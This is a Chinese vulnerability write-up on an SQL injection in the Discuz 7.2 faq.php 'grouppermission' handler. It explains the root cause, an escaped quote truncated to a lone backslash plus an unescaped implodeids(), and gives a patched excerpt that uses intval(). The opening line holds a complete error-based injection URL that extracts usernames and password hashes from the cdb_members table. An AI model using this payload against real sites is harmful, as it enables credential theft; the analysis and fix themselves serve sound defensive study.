Discuz 7.2 版 faq.php 的 SQL 注入漏洞分析
注入代码实例:
https://www.nhooo.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)and(select1from(selectcount(*),concat((select(select(selectconcat(username,0x20,password)fromcdb_memberslimit0,1))from`information_schema`.tableslimit0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)%23
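漏洞分析(by phithon):从上面的请求可以看出,$gids 可以由请求参数控制。当其中某个元素是字符串而不是数组时,$row[0] 只会取到该字符串的第一个字符;在输入已被转义的前提下(Discuz 会对请求变量做转义,请对照完整源码确认),单引号的首字符就是一个反斜杠。implodeids() 拼接时只加引号、不做转义,这个反斜杠会吃掉闭合引号,使后一个元素脱离字符串进入 SQL 语句。修复思路:使用前初始化 $gids,并对每个组 ID 做 intval() 处理。相关代码如下: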
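// Excerpt of the 'grouppermission' branch of faq.php, followed by the helper
// it calls. Whitespace lost in extraction has been restored. The keyword that
// opens the branch is missing from the page; `if` is used here so the fragment
// parses. "omitted" marks code that the write-up elides.
//
// Root cause, as far as this excerpt shows:
//   1. The sample request passes gids[...] as query parameters and those
//      values reach $gids here, so $gids is attacker-influenced.
//      NOTE(review): presumably request variables are imported as globals and
//      $gids is not reset before this point. Confirm in the full file, and
//      initialise it (`$gids = array();`) before the omitted code fills it.
//   2. The loop body as shipped was `$groupids[] = $row[0];`. When $row is a
//      string rather than an array, [0] yields only its first character; for
//      a quote that was already escaped on input that character is a lone
//      backslash (NOTE(review): assumes request input is escaped before it
//      gets here; confirm).
//   3. implodeids() wraps each value in single quotes without escaping, so a
//      lone backslash swallows the closing quote and the following list
//      element is parsed as SQL instead of string data.
if ($action == 'grouppermission') {
    // ... omitted in the write-up ...
    ksort($gids);
    $groupids = array();
    foreach ($gids as $row) {
        // Hardened: accept only array rows and force the id to an integer, so
        // no quote, backslash or SQL text can reach the IN (...) list.
        // NOTE(review): assumes group ids are integers; confirm against the schema.
        if (is_array($row) && isset($row[0])) {
            $groupids[] = intval($row[0]);
        }
    }

    $query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (" . implodeids($groupids) . ")");
    // ... omitted in the write-up ...
}

/**
 * Join values into a single-quoted, comma-separated list for an SQL IN clause.
 *
 * The values are NOT escaped here: every element is placed between quotes
 * verbatim, so callers must pass only values that are already safe (for
 * example integers). An empty argument returns '', which leaves the caller
 * with an empty `IN ()` list.
 *
 * @param mixed $array Array of values, or a single scalar value.
 * @return string Quoted list such as '1','2', or '' when $array is empty.
 */
function implodeids($array) {
    if (!empty($array)) {
        return "'" . implode("','", is_array($array) ? $array : array($array)) . "'";
    } else {
        return '';
    }
}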